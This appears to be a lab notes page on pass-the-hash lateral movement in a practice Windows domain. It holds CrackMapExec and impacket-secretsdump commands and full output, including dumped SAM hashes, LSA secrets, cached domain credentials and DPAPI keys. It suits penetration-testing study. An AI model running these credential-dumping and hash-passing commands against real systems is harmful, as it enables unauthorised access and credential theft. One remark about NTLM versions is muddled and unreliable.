Pass the Hash
Last updated
Last updated
We can use the password or hash to move literally in the network.
We can pass a password and sweep the subnet
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u fcastle -d MARVEL.local -p Password1
SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB 192.168.145.138 445 HYDRA-DC [+] MARVEL.local\fcastle:Password1
SMB 192.168.145.140 445 SPIDERMAN [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
SMB 192.168.145.139 445 THEPUNISHER [+] MARVEL.local\fcastle:Password1 (Pwn3d!)or We can also pass a hash (Works only on NTLM v1 . V2 can be relayed not passed)
crackmapexec smb -L
(opens the capabilities list it down)We can dump SAM, LSA or smbshares
crackmapexec smb <target_ip> -u Administrator -p <password> --sam --local-auth
crackmapexec smb <target_ip> -u Administrator -p <password> --lsa --local-auth
crackmapexec smb <target_ip> -u Administrator -p <password> --shares --local-auth┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u fcastle -d MARVEL.local -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --sam
SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB 192.168.145.138 445 HYDRA-DC [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b
SMB 192.168.145.140 445 SPIDERMAN [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB 192.168.145.139 445 THEPUNISHER [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB 192.168.145.140 445 SPIDERMAN [+] Dumping SAM hashes
SMB 192.168.145.139 445 THEPUNISHER [+] Dumping SAM hashes
SMB 192.168.145.140 445 SPIDERMAN Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB 192.168.145.140 445 SPIDERMAN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.145.139 445 THEPUNISHER Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB 192.168.145.139 445 THEPUNISHER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.145.140 445 SPIDERMAN DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.145.140 445 SPIDERMAN WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6c42d69c9d60ac3c1412febf3d04ca76:::
SMB 192.168.145.139 445 THEPUNISHER DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.145.140 445 SPIDERMAN peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB 192.168.145.140 445 SPIDERMAN [+] Added 5 SAM hashes to the database
SMB 192.168.145.139 445 THEPUNISHER WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
SMB 192.168.145.139 445 THEPUNISHER frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB 192.168.145.139 445 THEPUNISHER [+] Added 5 SAM hashes to the database┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth --shares
SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False)
SMB 192.168.145.139 445 THEPUNISHER [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB 192.168.145.138 445 HYDRA-DC [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE
SMB 192.168.145.140 445 SPIDERMAN [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB 192.168.145.139 445 THEPUNISHER [+] Enumerated shares
SMB 192.168.145.139 445 THEPUNISHER Share Permissions Remark
SMB 192.168.145.139 445 THEPUNISHER ----- ----------- ------
SMB 192.168.145.139 445 THEPUNISHER ADMIN$ READ,WRITE Remote Admin
SMB 192.168.145.139 445 THEPUNISHER C$ READ,WRITE Default share
SMB 192.168.145.139 445 THEPUNISHER IPC$ READ Remote IPC
SMB 192.168.145.140 445 SPIDERMAN [+] Enumerated shares
SMB 192.168.145.140 445 SPIDERMAN Share Permissions Remark
SMB 192.168.145.140 445 SPIDERMAN ----- ----------- ------
SMB 192.168.145.140 445 SPIDERMAN ADMIN$ READ,WRITE Remote Admin
SMB 192.168.145.140 445 SPIDERMAN C$ READ,WRITE Default share
SMB 192.168.145.140 445 SPIDERMAN IPC$ READ Remote IPCcrackmapexec smb <target_ip> -u <username> -p <password> -M lsassy -o METHOD=nanodump--lsa in CrackMapExecPurpose: Dumps LSA secrets from the registry, such as:
Stored service account passwords
Cached domain credentials
Auto-logon passwords
Scheduled task creds
Mechanism: This is a registry read, not a memory dump. It does not touch LSASS directly.
Command Example:
bashCopyEditcrackmapexec smb <target_ip> -u <username> -p <password> --lsaRequires:
Administrator privileges
Access to registry remotely
Output Example:
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth --lsa
SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False)
SMB 192.168.145.139 445 THEPUNISHER [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB 192.168.145.138 445 HYDRA-DC [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE
SMB 192.168.145.140 445 SPIDERMAN [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB 192.168.145.139 445 THEPUNISHER [+] Dumping LSA secrets
SMB 192.168.145.140 445 SPIDERMAN [+] Dumping LSA secrets
SMB 192.168.145.139 445 THEPUNISHER MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-14 05:44:23)
SMB 192.168.145.139 445 THEPUNISHER MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:44:02)
SMB 192.168.145.140 445 SPIDERMAN MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:53:16)
SMB 192.168.145.140 445 SPIDERMAN MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-16 06:49:57)
SMB 192.168.145.140 445 SPIDERMAN MARVEL.LOCAL/pparker:$DCC2$10240#pparker#9f28ff35b303d014c9e85e35ab47d019: (2025-05-16 07:00:00)
SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:aes256-cts-hmac-sha1-96:c131c1e90e95f1b416556a534b8cb0ee62dd96cc145c46b0eb6d11f73eb1a5d1
SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00
SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
SMB 192.168.145.139 445 THEPUNISHER dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28
SMB 192.168.145.139 445 THEPUNISHER NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
SMB 192.168.145.139 445 THEPUNISHER [+] Dumped 9 LSA secrets to /home/kali/.cme/logs/THEPUNISHER_192.168.145.139_2025-05-20_232936.secrets and /home/kali/.cme/logs/THEPUNISHER_192.168.145.139_2025-05-20_232936.cached
SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:aes128-cts-hmac-sha1-96:8234a83db77e524d118254a404aa48b2
SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:des-cbc-md5:61c2c129effe1ab3
SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:plain_password_hex:a2c5160c8c59c6a5e7ef3f304d110706f4365b36debbb27afdd4e37eadabe6443cb79031a728372c0d53558b1275186299aa74515f8c2f839527b86a1e3ef3e7d36273ab39c3117fe8d8c5acf02121b8cb5731bc8b99ec7752fc9bcfd8d78d4886ab65e6596a5cc60f9f86b5eeccdcddc7f5427ded633d50590f5bb16bb24d5ebaae02fc03afad34c6ec421293c3485d59271a713c1f008d4dbd889166d642b89fd6922404566532d775cd5a25a91d770fb8cbf4eca57c45e82b0b05fa33825e5fc47915705f187895da756590e30b45fefb4a348fc33bad9efec57e07c537f7d93689582c4be10f8218dc05b7980a03
SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:aad3b435b51404eeaad3b435b51404ee:8e5314ef4d8a661d84f21118e80ecc9a:::
SMB 192.168.145.140 445 SPIDERMAN dpapi_machinekey:0x6380f87fdc42b92f622c31e7145a2fab193d5341
dpapi_userkey:0x4214531dfc2db4013de58ed96a7b088c7fbbb6e9
SMB 192.168.145.140 445 SPIDERMAN NL$KM:b47d88cd15dd2f727f1e5dbbb6086ac5085d53578924e84553154bf44d1483a6a877696579c58b9be2d2adfc665199da58447bb258affaa8c543903649ee4f4d
SMB 192.168.145.140 445 SPIDERMAN [+] Dumped 10 LSA secrets to /home/kali/.cme/logs/SPIDERMAN_192.168.145.140_2025-05-20_232936.secrets and /home/kali/.cme/logs/SPIDERMAN_192.168.145.140_2025-05-20_232936.cached
-M lsassy ModulePurpose: Dumps live credentials from LSASS memory, including:
Cleartext passwords
NTLM hashes
Kerberos tickets
Mechanism:
Runs a memory dump using a method like procdump, comsvcs, or nanodump, then parses it using lsassy.
Command Example:
bashCopyEditcrackmapexec smb <target_ip> -u <username> -p <password> -M lsassyRequires:
Administrator privileges
Ability to execute dump remotely
AV/EDR may block it
Output Example:
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth -M lsassy
SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False)
SMB 192.168.145.138 445 HYDRA-DC [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE
SMB 192.168.145.139 445 THEPUNISHER [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB 192.168.145.140 445 SPIDERMAN [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)Keeps record of all cracked user accounts
┌──(kali㉿kali)-[~]
└─$ cmedb
cmedb (default)(smb) > creds
+Credentials---------+-----------+-------------+--------------------+-------------------------------------------------------------------+
| CredID | Admin On | CredType | Domain | UserName | Password |
+--------+-----------+-----------+-------------+--------------------+-------------------------------------------------------------------+
| 1 | 2 Host(s) | plaintext | MARVEL | fcastle | Password1 |
| 2 | 0 Host(s) | hash | THEPUNISHER | Administrator | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 3 | 0 Host(s) | hash | SPIDERMAN | Administrator | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 4 | 0 Host(s) | hash | THEPUNISHER | Guest | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 5 | 0 Host(s) | hash | SPIDERMAN | Guest | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 6 | 0 Host(s) | hash | THEPUNISHER | DefaultAccount | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 7 | 0 Host(s) | hash | SPIDERMAN | DefaultAccount | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 8 | 0 Host(s) | hash | THEPUNISHER | WDAGUtilityAccount | aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb |
| 9 | 0 Host(s) | hash | SPIDERMAN | WDAGUtilityAccount | aad3b435b51404eeaad3b435b51404ee:6c42d69c9d60ac3c1412febf3d04ca76 |
| 10 | 0 Host(s) | hash | THEPUNISHER | frankcastle | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 11 | 0 Host(s) | hash | SPIDERMAN | peterparker | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 12 | 2 Host(s) | hash | MARVEL | fcastle | 64f12cddaa88057e06a81b54e73b949b |
+--------+-----------+-----------+-------------+--------------------+-------------------------------------------------------------------+Dumps SAM as well as other secrets from registry
impacket-secretsdump 'MARVEL.local/fcastle:[email protected]'┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump 'MARVEL.local/fcastle:[email protected]'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-14 05:44:23)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:44:02)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00
MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28
[*] NL$KM
0000 09 9F C6 F6 60 EF 09 3E 30 CC 5B AA C7 AC 5A FB ....`..>0.[...Z.
0010 CA 61 47 50 2D 62 B1 36 D6 59 69 2F 82 CB 81 DE .aGP-b.6.Yi/....
0020 D8 20 BF 99 BA 90 0C 47 10 9E 8E CB F5 01 E2 F0 . .....G........
0030 0C 9C FC 1A BF AD 66 7B 03 11 DA A4 DF CD 60 63 ......f{......`c
NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
